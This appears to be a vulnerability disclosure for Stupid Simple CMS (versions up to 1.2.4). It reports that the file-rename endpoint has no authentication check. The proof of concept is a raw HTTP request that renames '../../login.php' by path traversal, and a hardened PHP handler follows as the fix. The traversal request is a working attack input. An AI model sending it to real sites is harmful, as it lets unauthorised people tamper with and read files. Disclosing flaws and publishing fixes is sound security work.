product: Stupid Simple CMS ( Blogger )
download link: https://github.com/codelyfe/Stupid-Simple-CMS
version: <=1.2.4
POC:
POST http://localhost/file-manager/rename.php HTTP/1.1
Host: localhost
Content-Length: 36
sec-ch-ua: "Chromium";v="91", " Not;A Brand";v="99"
Accept: */*
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/file-manager/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
oldName=../../login.php&newName=1.txt

The code audit found that the file-rename endpoint performs no authentication check, which can lead to arbitrary file reading.
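A hardened handler for the same endpoint, as an added example that is not the project's code: it adds the missing authentication check and rejects the path traversal shown in the POC. The session key `user` and the `uploads` directory are assumptions.

```php
<?php
// Added example, not the project's code: a hardened rename.php. Assumptions:
// a logged-in session sets $_SESSION['user'], and managed files live in the
// hypothetical UPLOAD_DIR below.
session_start();

define('UPLOAD_DIR', realpath(__DIR__ . '/uploads')); // assumed location

function deny(int $code, string $msg): void {
    http_response_code($code);
    header('Content-Type: text/plain; charset=UTF-8');
    exit($msg);
}

// Accept a single path component only: no "/" or "\", and not "." or "..".
function safe_name(string $name): ?string {
    if ($name === '' || strlen($name) > 255) return null;
    if (!preg_match('/\A[A-Za-z0-9._-]+\z/', $name)) return null;
    if ($name === '.' || $name === '..') return null;
    return $name;
}

// 1. Authentication: the vulnerable endpoint had none.
if (empty($_SESSION['user'])) {
    deny(401, 'authentication required');
}

// 2. Name validation: "../../login.php" from the POC is rejected here.
$old = safe_name($_POST['oldName'] ?? '');
$new = safe_name($_POST['newName'] ?? '');
if ($old === null || $new === null) {
    deny(400, 'invalid file name');
}

// 3. Containment: resolve the source and confirm it is inside UPLOAD_DIR,
//    so the check holds even if the allowlist above is relaxed later.
$src = realpath(UPLOAD_DIR . '/' . $old);
$dst = UPLOAD_DIR . '/' . $new;
if ($src === false || strpos($src, UPLOAD_DIR . DIRECTORY_SEPARATOR) !== 0) {
    deny(404, 'no such file');
}
if (file_exists($dst)) {
    deny(409, 'target already exists');
}
if (!rename($src, $dst)) {
    deny(500, 'rename failed');
}
echo 'ok';
```

Since the request is a state-changing POST, the same handler should also verify a CSRF token before acting; that check is omitted here to keep the example short.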